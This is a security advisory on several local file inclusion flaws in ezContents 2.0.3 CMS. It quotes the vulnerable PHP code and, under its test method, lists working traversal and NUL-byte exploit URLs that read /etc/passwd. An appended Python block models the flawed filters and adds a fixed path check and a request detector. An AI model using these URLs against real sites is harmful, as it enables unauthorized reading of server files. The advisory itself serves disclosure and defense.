
ezContents CMS Multiple Local File Inclusion Vulnerabilities



Published: 2008-08-25

Updated: 2008-08-26



Affected systems:

VisualShapers ezContents 2.0.3



Description:

BUGTRAQ ID: 30821

ezContents is an open-source content management system.

Several ezContents scripts do not properly validate their input parameters. A remote attacker can include arbitrary local resources and thereby execute arbitrary code.







1. Local file inclusion in /module.php

Vulnerable code at lines 32-42 and 141-145
--------------------------



#################################################

$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");

if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];

// Single, non-recursive pass: removing '../' once is the only traversal filter applied to link
$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);

...

if (isExternalLink ($HTTP_GET_VARS["link"])) {
    ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
} else {
    include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);
}

#################################################







The isExternalLink() function in /include/functions.php is the check against remote inclusion attempts.

Lines 768-779
-------------------



#################################################

function isExternalLink ($linkref)
{
    // Only URL schemes are rejected; a relative local path never counts as "external"
    if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:') ||
         (substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) == 'ftp:') ||
         (substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == 'mailto:') ||
         (substr($linkref,0,5) == 'news:') ||
         (substr($linkref,0,7) == 'telnet:') || (substr($linkref,0,5) == 'wais:') ) {
        return True;
    } else {
        return False;
    }
} // isExternalLink

#################################################







2. Local file inclusion in the /modules/diary/showdiary.php, /modules/diary/showeventlist.php, /modules/gallery/showgallery.php and /modules/reviews/showreviews.php scripts

Successful exploitation requires register_globals to be enabled.

showdiary.php, lines 32-45
--------------------------------



#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}

$GLOBALS["ModuleName"] = 'diary';

if (!isset($GLOBALS["gsLanguage"])) {
    Header("Location: ".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"]."/showdiary.php");
}
// language_home and gsLanguage come straight from $GLOBALS, which register_globals lets a request populate
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################







The /modules/moduleSec.php script is the check against inclusion attempts.







#################################################

function moduleExternalLink ($linkref)
{
    if ($linkref != '') {
        if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:') ||
             (substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) == 'ftp:') ||
             (substr($linkref,0,7) == 'gopher:') || (substr($linkref,0,7) == 'mailto:') ||
             (substr($linkref,0,5) == 'news:') ||
             (substr($linkref,0,7) == 'telnet:') || (substr($linkref,0,5) == 'wais:') ) {
            return True;
        } else {
            return False;
        }
    } else {
        return False;
    }
} // moduleExternalLink

if (!(isset($GLOBALS["rootdp"]))) {
    ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents'; DIE;
}
// Each path variable is only tested for a URL scheme, so a local traversal path passes every check
if ( (moduleExternalLink($GLOBALS["rootdp"])) || (moduleExternalLink($GLOBALS["modfiledir"])) ||
     (moduleExternalLink($GLOBALS["modules_home"])) || (moduleExternalLink($GLOBALS["admin_home"])) ||
     (moduleExternalLink($GLOBALS["language_home"])) ) {
    ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents'; DIE;
}

#################################################







3. Local file inclusion in the /modules/diary/showdiarydetail.php, /modules/gallery/showgallerydetails.php, /modules/reviews/showreviewsdetails.php and /modules/news/shownewsdetails.php scripts

Successful exploitation requires register_globals to be enabled.

showdiarydetail.php, lines 32-46
--------------------------------------



#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}

$GLOBALS["ModuleName"] = 'diary';

include_once ($GLOBALS["admin_home"]."compile.php");

include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################







4. Local file inclusion in the /modules/diary/submit_diary.php, /modules/gallery/submit_gallery.php, /modules/guestbook/submit_guestbook.php, /modules/reviews/submit_reviews.php and /modules/news/submit_news.php scripts

Successful exploitation requires register_globals to be enabled.

submit_diary.php, lines 32-51
-----------------------------------



#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}

// Localisation variables (used for default values)
// Change these to suit your site preferences
//
$expiryperiod = 'm'; // Time period to calculate the banner expiry date (based on today's date)
$expirynumber = 1;

$GLOBALS["ModuleName"] = 'diary';

include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################







5. Local file inclusion in /modules/news/archivednews_summary.php and /modules/news/news_summary.php

Successful exploitation requires register_globals to be enabled.

news_summary.php, lines 32-41
-----------------------------------



#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}

include_once ($GLOBALS["admin_home"]."compile.php");

#################################################







6. Local file inclusion in /modules/diary/inlineeventlist.php and /modules/news/inlinenews.php

Successful exploitation requires register_globals to be enabled.

inlinenews.php, lines 32-52
---------------------------------



#################################################

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}

global $EZ_SESSION_VARS;

$GLOBALS["ModuleName"] = 'news';

// $nLink is an uninitialised global; with register_globals on it is request-controlled
$linkref = $nLink;
$chainlink = explode('/',$linkref);
$modfilename = array_pop($chainlink);
$GLOBALS["modfiledir"] = implode('/',$chainlink);
include($GLOBALS["modfiledir"]."/moduleref.php");

include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#################################################



<*Source: Digital Security Research Group

Link: http://marc.info/?l=bugtraq&m=121968090815635&w=2
*>



Test method:

Warning: the following programs (methods) may be offensive in nature and are provided for security research and teaching only. Users bear the risk themselves!

http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/

http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00

http://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
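As an added illustration (not code from the advisory or from ezContents), the Python below re-creates the two checks from /module.php and isExternalLink() to show why a single-pass str_replace('../', '') still lets '....//' reach include(), puts a canonicalising allowlist check beside them as the fix, and runs a small detector over constructed request lines for the traversal, NUL-byte and register_globals patterns seen in the test URLs above. WEB_ROOT, the allowed directory and the sample request lines are assumed values.

```python
import posixpath
from urllib.parse import unquote
# Constructed install path for the demonstration; not taken from the advisory.
WEB_ROOT = "/var/www/ezcontents"
URL_SCHEMES = ("http:", "https:", "file:", "ftp:", "gopher:", "mailto:", "news:", "telnet:", "wais:")
PATH_GLOBALS = {"rootdp", "gsLanguage", "language_home", "admin_home", "nLink"}  # register_globals-settable

def ezcontents_strip(link):
    """Mirror of module.php: str_replace('../', '', $link), one non-recursive pass."""
    return link.replace("../", "")

def is_external_link(link):
    """Mirror of isExternalLink(): rejects URL schemes only, so any local path passes."""
    return link.startswith(URL_SCHEMES)

def vulnerable_include_target(link):
    """Path module.php hands to include() after its two checks (None when blocked)."""
    link = ezcontents_strip(link)
    if is_external_link(link):
        return None
    # '....//' survives the strip as '../', so normalisation walks out of WEB_ROOT.
    return posixpath.normpath(posixpath.join(WEB_ROOT, link))

def safe_include_target(link, allowed_dir="modules"):
    """Hardened check: reject NUL/absolute paths, canonicalise, then require the result
    to stay under WEB_ROOT/allowed_dir (add os.path.realpath in a real deployment)."""
    link = unquote(link)
    if "\x00" in link or posixpath.isabs(link):
        return None
    base = posixpath.normpath(posixpath.join(WEB_ROOT, allowed_dir))
    target = posixpath.normpath(posixpath.join(base, link))
    return target if target == base or target.startswith(base + "/") else None

def flag_lfi_requests(request_lines):
    """Detection side: request lines whose query carries traversal, a NUL byte, or an
    override of one of the register_globals path variables."""
    hits = []
    for line in request_lines:
        query = unquote(line.split("?", 1)[1].split(" ", 1)[0]) if "?" in line else ""
        names = {p.split("=", 1)[0] for p in query.split("&") if p}
        if "../" in query or "\x00" in query or names & PATH_GLOBALS:
            hits.append(line)
    return hits

# Constructed sample request lines (not real log data)
SAMPLE_REQUESTS = [
    "GET /ezcontents/module.php?link=modules/news/inlinenews.php HTTP/1.1",
    "GET /ezcontents/module.php?link=....//....//....//....//etc/passwd HTTP/1.1",
    "GET /ezcontents/modules/news/inlinenews.php?rootdp=X&gsLanguage=../../etc/passwd%00 HTTP/1.1",
]
```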



Solution:

Vendor patch:

VisualShapers
-------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://www.visualshapers.com/